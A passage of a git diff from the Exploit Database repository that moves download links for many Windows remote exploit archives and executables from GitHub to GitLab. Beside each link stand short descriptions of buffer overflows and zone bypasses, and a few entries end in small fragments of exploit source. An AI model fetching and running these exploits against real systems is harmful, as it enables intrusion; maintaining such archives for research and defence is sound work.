software, the program will crash. If the program is running as a service, the service will consume all available memory and crash the entire system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19611.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19611.zip \ No newline at end of file diff --git a/exploits/windows/remote/19614.asm b/exploits/windows/remote/19614.asm index 90234af25..a822e2c5e 100644 --- a/exploits/windows/remote/19614.asm +++ b/exploits/windows/remote/19614.asm @@ -606,4 +606,4 @@ endp end start -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19614.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19614.exe \ No newline at end of file diff --git a/exploits/windows/remote/19617.txt b/exploits/windows/remote/19617.txt index 3e01d141d..59cc76dd7 100644 --- a/exploits/windows/remote/19617.txt +++ b/exploits/windows/remote/19617.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/790/info The POP server that is part of the NetcPlus SmartServer3 email server has an unchecked buffer that could allow an attacker to execute code on the server. If the USER command is followed by an argument of over 800 characters, the input buffer will be overflowed, and data from the argument will be passed to the system to be executed at the privelege level of the SmartServer program. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19617.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19617.zip \ No newline at end of file diff --git a/exploits/windows/remote/19679.txt b/exploits/windows/remote/19679.txt index 02a730cab..f9f749af1 100644 --- a/exploits/windows/remote/19679.txt +++ b/exploits/windows/remote/19679.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/874/info Infoseek's Ultraseek enterprise search server listens on port 8765 by default for HTTP commands. The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19679-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19679-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19679-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19679-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/19688.txt b/exploits/windows/remote/19688.txt index 03bf0731b..faf12b857 100644 --- a/exploits/windows/remote/19688.txt +++ b/exploits/windows/remote/19688.txt @@ -8,6 +8,6 @@ USSR exploit: Binary exploit - 19688.exe Source code - 19688.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19688.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19688.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19688.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19688.zip \ No newline at end of file diff --git a/exploits/windows/remote/19743.txt b/exploits/windows/remote/19743.txt index 62e898e30..2b3a8184c 100644 --- a/exploits/windows/remote/19743.txt +++ b/exploits/windows/remote/19743.txt @@ -15,8 +15,8 @@ Source code for above exploit link.bro: Example of a malformed shortcut file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19743-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19743-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19743-2.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19743-2.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19743-3.bro \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19743-3.bro \ No newline at end of file diff --git a/exploits/windows/remote/19895.txt b/exploits/windows/remote/19895.txt index c87f44fee..53417b402 100644 --- a/exploits/windows/remote/19895.txt +++ b/exploits/windows/remote/19895.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1172/info DNews News Server is a CGI application that gives access to auser's NNTP server over the web. There are many unchecked buffers in the program, some of which can be exploited directly from any browser. Supplying an overlylong value for the "group", "cmd" and "utag" variables, and possibly others, will overwrite their respective buffers. In this manner, arbitrary code can be executed on the remote target. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19895.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19895.zip \ No newline at end of file diff --git a/exploits/windows/remote/20079.txt b/exploits/windows/remote/20079.txt index 13dd98dc9..775a164f6 100644 --- a/exploits/windows/remote/20079.txt +++ b/exploits/windows/remote/20079.txt @@ -17,6 +17,6 @@ A user would only have to download an offending email in order to become suscept Windows Console Version - 20079-2.exe Windows Console Version Source - 20079-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20079-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20079-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20079-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20079-2.exe \ No newline at end of file diff --git a/exploits/windows/remote/20106.cpp b/exploits/windows/remote/20106.cpp index b9ecb97d0..1d73b1ee4 100644 --- a/exploits/windows/remote/20106.cpp +++ b/exploits/windows/remote/20106.cpp @@ -3733,4 +3733,4 @@ int main(int argc, char* argv[]) } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20106.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20106.exe \ No newline at end of file diff --git a/exploits/windows/remote/20184.txt b/exploits/windows/remote/20184.txt index 7780274f9..081e69d54 100644 --- a/exploits/windows/remote/20184.txt +++ b/exploits/windows/remote/20184.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1627/info IRIS from eEye Digital Security is a protocol analyzer geared towards network management, it is currently in BETA. This product was formerly known as SpyNet CaptureNet. Certain versions of the this software are vulnerable to a remotely triggered buffer overflow attack. This attack is orchestrated by a malicious user launching multiple UDP sessions to random ports on the machine which IRIS resides on (and is in operation on). The net result of this buffer overflow is that the product ceases to function and may drive system resources to 100% before exiting. It may be possible that this overflow (a heap overflow according to the attached advisory) could result in a system compromise. No information indicating that this is the case has been released. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20184.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20184.zip \ No newline at end of file diff --git a/exploits/windows/remote/20240.txt b/exploits/windows/remote/20240.txt index 81005a400..91dd6350a 100644 --- a/exploits/windows/remote/20240.txt +++ b/exploits/windows/remote/20240.txt @@ -7,6 +7,6 @@ If a user of Outlook or Outlook Express were to receive an RTF email containing Binary - 20240-1.exe Source - 20240-2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20240-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20240-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20240-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20240-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/20283.txt b/exploits/windows/remote/20283.txt index e85e87df1..bdea4a3df 100644 --- a/exploits/windows/remote/20283.txt +++ b/exploits/windows/remote/20283.txt @@ -12,4 +12,4 @@ Windows 9x remote administration is also affected by this vulnerability because Successful exploitation of this vulnerability could lead to the retrieval, modification, addition, and deletion of files residing on a file or print share. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20283.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20283.zip \ No newline at end of file diff --git a/exploits/windows/remote/20284.txt b/exploits/windows/remote/20284.txt index 72ae339d3..567f55321 100644 --- a/exploits/windows/remote/20284.txt +++ b/exploits/windows/remote/20284.txt @@ -13,4 +13,4 @@ Windows 9x remote administration is also affected by this vulnerability because Successful exploitation of this vulnerability could lead to the retrieval, modification, addition, and deletion of files residing on a file or print share. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20284.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20284.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/20334.java b/exploits/windows/remote/20334.java index 30ed4515c..1ecedde2a 100644 --- a/exploits/windows/remote/20334.java +++ b/exploits/windows/remote/20334.java @@ -195,4 +195,4 @@ public class newftpbrute -}//class +}//class \ No newline at end of file diff --git a/exploits/windows/remote/20427.txt b/exploits/windows/remote/20427.txt index 5d1352bcb..b4ea650b1 100644 --- a/exploits/windows/remote/20427.txt +++ b/exploits/windows/remote/20427.txt @@ -8,4 +8,4 @@ Depending on the data that is copied, a denial of service attack could be launch If a user was misled to download a hostile .ASX file to the local machine, they would only have to single click on the file within Windows Explorer to activate the code. This is due to the 'Web View' option that is used by Windows Explorer to preview web documents automatically while browsing (this feature is enabled by default). In addition, a malformed .ASX file could be embedded into a HTML document and be configured to execute when opened via a browser or HTML compliant email client. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20427.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20427.zip \ No newline at end of file diff --git a/exploits/windows/remote/2054.txt b/exploits/windows/remote/2054.txt index 220c2aa06..e454a605a 100644 --- a/exploits/windows/remote/2054.txt +++ b/exploits/windows/remote/2054.txt @@ -1,5 +1,5 @@ MS Windows DHCP Client Broadcast Attack Exploit (MS06-036) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2054.tar.gz (07212006-MS06_036_DHCP_Client.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2054.tar.gz (07212006-MS06_036_DHCP_Client.tar.gz) # milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/exploits/windows/remote/20547.txt b/exploits/windows/remote/20547.txt index 4200027a3..6901a1ac2 100644 --- a/exploits/windows/remote/20547.txt +++ b/exploits/windows/remote/20547.txt @@ -20,5 +20,4 @@ was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability." -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20547.rar - +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20547.rar \ No newline at end of file diff --git a/exploits/windows/remote/20571.txt b/exploits/windows/remote/20571.txt index a0daf16d6..75a4646d5 100644 --- a/exploits/windows/remote/20571.txt +++ b/exploits/windows/remote/20571.txt @@ -4,4 +4,4 @@ Versions of MS Outlook are vulnerable to receiving a hidden, potentially hostile This can also be used to circumvent Outlook's dangerous file security feature. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20571.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20571.zip \ No newline at end of file diff --git a/exploits/windows/remote/20758.c b/exploits/windows/remote/20758.c index d096d7fd8..7fc3982e0 100644 --- a/exploits/windows/remote/20758.c +++ b/exploits/windows/remote/20758.c @@ -8,7 +8,7 @@ Version: 0.3z R2 Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003, Windows Server 2008, it should work on all Windows. -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20758.tar.gz +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20758.tar.gz */ #include "main.h" diff --git a/exploits/windows/remote/20774.txt b/exploits/windows/remote/20774.txt index ef7fdb629..6e8681f92 100644 --- a/exploits/windows/remote/20774.txt +++ b/exploits/windows/remote/20774.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/2612/info The default operation performed to open a filetype is determining by referencing the filetype's CLSID. Due to a flaw in the interpretation of CLSIDs when appended to a filename, it is possible to specify a different default action for a given file than would normally be used. As a result, seemingly harmless files (.txt, .jpg etc) may be opened in a nonstandard, attacker specified manner. For example, a program ("evil.exe") could be renamed "evil.jpg.{CLSID_of_executables}" and when opened by the target user, this file will be executed instead of opened by their default .jpg viewer. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20774.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20774.zip \ No newline at end of file diff --git a/exploits/windows/remote/20775.txt b/exploits/windows/remote/20775.txt index 5604c94d8..c72d7630d 100644 --- a/exploits/windows/remote/20775.txt +++ b/exploits/windows/remote/20775.txt @@ -6,4 +6,4 @@ This overflow, if successfully exploited, allows execution of arbitrary code by Hosts with SmartDownload installed are vulnerable regardless of whether SmartDownload is enabled. Exploit code is available for this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20775.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20775.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/20818.txt b/exploits/windows/remote/20818.txt index 18a6912e7..1caf5e50b 100644 --- a/exploits/windows/remote/20818.txt +++ b/exploits/windows/remote/20818.txt @@ -4,4 +4,4 @@ Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handle * If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20818.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20818.zip \ No newline at end of file diff --git a/exploits/windows/remote/20820.c b/exploits/windows/remote/20820.c index 1768c7d28..08de716e8 100644 --- a/exploits/windows/remote/20820.c +++ b/exploits/windows/remote/20820.c @@ -118,6 +118,6 @@ int main () } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20820-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20820-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20820-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20820-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/20840.txt b/exploits/windows/remote/20840.txt index 741a7f614..fce7f84ff 100644 --- a/exploits/windows/remote/20840.txt +++ b/exploits/windows/remote/20840.txt @@ -16,4 +16,4 @@ Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20840.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20840.tgz \ No newline at end of file diff --git a/exploits/windows/remote/20841.txt b/exploits/windows/remote/20841.txt index 598b8eaf0..13bf41d4b 100644 --- a/exploits/windows/remote/20841.txt +++ b/exploits/windows/remote/20841.txt @@ -16,4 +16,4 @@ Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20841.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20841.zip \ No newline at end of file diff --git a/exploits/windows/remote/20842.txt b/exploits/windows/remote/20842.txt index 04b5d7095..61f4b7384 100644 --- a/exploits/windows/remote/20842.txt +++ b/exploits/windows/remote/20842.txt @@ -16,4 +16,4 @@ Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20842.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20842.tgz \ No newline at end of file diff --git a/exploits/windows/remote/21169.txt b/exploits/windows/remote/21169.txt index 8f22e1528..1b9c9d8c2 100644 --- a/exploits/windows/remote/21169.txt +++ b/exploits/windows/remote/21169.txt @@ -8,4 +8,4 @@ Exploitation will result in a violation of security policy. Tiny Personal Firewall, ZoneAlarm and ZoneAlarm Pro are confirmed vulnerable. It is believed that other applications similar in design may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21169.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21169.zip \ No newline at end of file diff --git a/exploits/windows/remote/21196.txt b/exploits/windows/remote/21196.txt index d20d2b7a9..2e884c13f 100644 --- a/exploits/windows/remote/21196.txt +++ b/exploits/windows/remote/21196.txt @@ -8,4 +8,4 @@ It is important to note that there is currently no way for an AIM user to block **AOL has made modifications to their AIM servers to prevent this vulnerability from being exploited through their servers. However, the underlying problem still exists in the client software which could still be exploited using something similar to a man in the middle attack or if an attacker can bypass the filters on the AIM servers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21196.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21196.tgz \ No newline at end of file diff --git a/exploits/windows/remote/21199.txt b/exploits/windows/remote/21199.txt index 7ab755c10..f07e4c3fe 100644 --- a/exploits/windows/remote/21199.txt +++ b/exploits/windows/remote/21199.txt @@ -4,4 +4,4 @@ Microsoft Internet Explorer is prone to a vulnerability which may disclose sensi When script code includes a file outside of the document it is embedded in and the file does not exist, the onError event handler will run script if it is enabled. This script can determine whether the file to be included exists or not. This can be used to verify the existence of files on client hosts by creating webpages that include files from the local host using 'file://'. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21199.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21199.zip \ No newline at end of file diff --git a/exploits/windows/remote/21542.c b/exploits/windows/remote/21542.c index d36a07d86..d8edf2075 100644 --- a/exploits/windows/remote/21542.c +++ b/exploits/windows/remote/21542.c @@ -148,4 +148,4 @@ void sock_err(int err) { } -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21542.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21542.exe \ No newline at end of file diff --git a/exploits/windows/remote/21618.txt b/exploits/windows/remote/21618.txt index 7ab57c56e..467d27855 100644 --- a/exploits/windows/remote/21618.txt +++ b/exploits/windows/remote/21618.txt @@ -4,4 +4,4 @@ ICQ is an instant messenger client for Microsoft Windows systems. ICQ includes s Reportedly, it is possible for a remote party to modify sound settings in ICQ by forcing a vulnerable user to access a blank .scm file. Allegedly, this may be done if the user views maliciously formatted HTML under some browsers. The HTML must reference a sound scheme file within an IFRAME tag. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21618.scm \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21618.scm \ No newline at end of file diff --git a/exploits/windows/remote/21631.txt b/exploits/windows/remote/21631.txt index 3e0c9ef1b..d89169d74 100644 --- a/exploits/windows/remote/21631.txt +++ b/exploits/windows/remote/21631.txt @@ -6,4 +6,4 @@ When including a certain string of characters between the filename and the actua The end result is that an attacker is able to entice a user to open or save files of arbitrary types to their local system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21631.eml \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21631.eml \ No newline at end of file diff --git a/exploits/windows/remote/21648.txt b/exploits/windows/remote/21648.txt index eb86a1803..0dd818536 100644 --- a/exploits/windows/remote/21648.txt +++ b/exploits/windows/remote/21648.txt @@ -6,4 +6,4 @@ Reportedly, Pegasus is vulnerable to a buffer overflow condition when processing This issue has been reported in Pegasus Mail 4.01. Earlier versions may share this vulnerability, this has not however been confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21648.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21648.zip \ No newline at end of file diff --git a/exploits/windows/remote/21692.txt b/exploits/windows/remote/21692.txt index 88ab6b47f..a55565b12 100644 --- a/exploits/windows/remote/21692.txt +++ b/exploits/windows/remote/21692.txt @@ -16,4 +16,4 @@ This vulnerability also exists in some versions of KDE and the included Konquero ** UPDATE 11/11/03 - Microsoft has updated their bulletin for this issue. Users who installed Internet Explorer 6 after installing Windows 2000 Service Pack 4 may have reintroduced this issue onto their systems. A new patch is available for users who installed Internet Explorer 6 on Windows 2000 SP4 systems. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21692.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21692.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/21902.c b/exploits/windows/remote/21902.c index f60460be7..0ca0ba807 100644 --- a/exploits/windows/remote/21902.c +++ b/exploits/windows/remote/21902.c @@ -132,4 +132,4 @@ int main(int argc, char ** argv) *(int*)pCode = addr ? addr : 0x77e79d02; *(pCode+4)=0; printf("%s%s%s",prefix,buff,postfix); -} +} \ No newline at end of file diff --git a/exploits/windows/remote/21913.txt b/exploits/windows/remote/21913.txt index 20d68f627..e0c30361b 100644 --- a/exploits/windows/remote/21913.txt +++ b/exploits/windows/remote/21913.txt @@ -6,4 +6,4 @@ It is possible for an attacker to obtain information regarding Published Applica By bruteforcing a Citrix Published Applications list, it may be possible for an attacker to launch further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21913.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21913.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/22022.txt b/exploits/windows/remote/22022.txt index 09aff6344..87733eb47 100644 --- a/exploits/windows/remote/22022.txt +++ b/exploits/windows/remote/22022.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow a remote attacker to redirect program flow to ma This vulnerability was discovered in Macromedia Flash ActiveX 6.0.47. It is not yet known if earlier versions are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22022.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22022.zip \ No newline at end of file diff --git a/exploits/windows/remote/22027.txt b/exploits/windows/remote/22027.txt index c93f75ac7..9f60c01c9 100644 --- a/exploits/windows/remote/22027.txt +++ b/exploits/windows/remote/22027.txt @@ -6,8 +6,8 @@ An applet constructed at the bytecode-level may be able to perform some illegal Code execution with the privileges of the victim user may be possible. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22027-1.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22027-1.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22027-2.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22027-2.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22027-3.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22027-3.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/22028.txt b/exploits/windows/remote/22028.txt index 2f7654081..52ce04b45 100644 --- a/exploits/windows/remote/22028.txt +++ b/exploits/windows/remote/22028.txt @@ -6,4 +6,4 @@ If a malicous applet is compiled by the vulnerable compiler, it may be possible Successful execution of attacker-supplied instructions may result in arbitrary system commands being executed outside of the Java sandbox, with privileges of the JVM process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22028.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22028.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/22194.txt b/exploits/windows/remote/22194.txt index e0cb4893a..9b420f342 100644 --- a/exploits/windows/remote/22194.txt +++ b/exploits/windows/remote/22194.txt @@ -4,4 +4,4 @@ It has been reported that the Microsoft Windows Locator service is affected by a This vulnerability may be exploited by remote attackers to execute custom instructions on the target server. It is also possible to crash the service with a malicious request. It should be noted that, to exploit this vulnerability, no authentication is required. Additionally, the Locator service is enabled by default on all Windows 2000 and Windows NT Domain Controllers (DC). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22194.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22194.zip \ No newline at end of file diff --git a/exploits/windows/remote/22288.txt b/exploits/windows/remote/22288.txt index 3dad5df16..5d40a3a12 100644 --- a/exploits/windows/remote/22288.txt +++ b/exploits/windows/remote/22288.txt @@ -4,6 +4,6 @@ Microsoft Internet Explorer contains a vulnerability that can allow script code There have been reports that some users may not be able to reproduce this vulnerability. When more information becomes available, this record will be updated. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22288-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22288-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22288-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22288-2.zip \ No newline at end of file diff --git a/exploits/windows/remote/22338.txt b/exploits/windows/remote/22338.txt index 6fa28be87..00bde94ad 100644 --- a/exploits/windows/remote/22338.txt +++ b/exploits/windows/remote/22338.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7044/info Clearswift MailSweeper does not properly process certain malformed MIME email message attachments. If the attachment does not contain a MIME-Version field, MailSweeper does not recognize the attachment as being an executable type. MailSweeper allows such attachments through, even if it is set to filter executable type file attachments from incoming email messages. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22338.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22338.zip \ No newline at end of file diff --git a/exploits/windows/remote/22341.txt b/exploits/windows/remote/22341.txt index e2dc74519..4cc44eb9b 100644 --- a/exploits/windows/remote/22341.txt +++ b/exploits/windows/remote/22341.txt @@ -8,4 +8,4 @@ Successful exploitation of this issue may allow an attacker to execute arbitrary It should be noted that this issue is limited to files that are displayed in the 'Download Dialog'. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22341.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22341.tgz \ No newline at end of file diff --git a/exploits/windows/remote/22367.txt b/exploits/windows/remote/22367.txt index 42cf4b4ab..63f1c18fe 100644 --- a/exploits/windows/remote/22367.txt +++ b/exploits/windows/remote/22367.txt @@ -14,4 +14,4 @@ Several other library functions which call the vulnerable ntdll.dll procedure ha ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22367.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22367.zip \ No newline at end of file diff --git a/exploits/windows/remote/22368.txt b/exploits/windows/remote/22368.txt index 9228910a9..fff3a2ed2 100644 --- a/exploits/windows/remote/22368.txt +++ b/exploits/windows/remote/22368.txt @@ -12,4 +12,4 @@ Several other library functions which call the vulnerable ntdll.dll procedure ha ** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22368.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22368.tar.gz \ No newline at end of file diff --git a/exploits/windows/remote/22575.txt b/exploits/windows/remote/22575.txt index 37d801e72..454150bc5 100644 --- a/exploits/windows/remote/22575.txt +++ b/exploits/windows/remote/22575.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7539/info Internet Explorer is reported to be vulnerable to a zone bypass issue. Allegedly, if Internet Explorer attempts to open a web page containing numerous 'file://' requests each contained in a separate Iframe, the requested file will eventually be executed in the Local Computer zone. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22575.rar (dmz.rar Password: zones) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22575.rar (dmz.rar Password: zones) \ No newline at end of file diff --git a/exploits/windows/remote/22726.txt b/exploits/windows/remote/22726.txt index a285e0f4e..6e1492af0 100644 --- a/exploits/windows/remote/22726.txt +++ b/exploits/windows/remote/22726.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/7806/info Microsoft Internet Explorer is prone to a boundary condition error when handling OBJECT tags in web pages. When a web page containing an OBJECT tag using a parameter containing excessive data is encountered by a vulnerable client, a internal memory buffer will be overrun. This could cause Internet Explorer to fail or potentially result in the execution arbitrary code in the security context of the current user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22726.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22726.tar \ No newline at end of file diff --git a/exploits/windows/remote/22872.txt b/exploits/windows/remote/22872.txt index 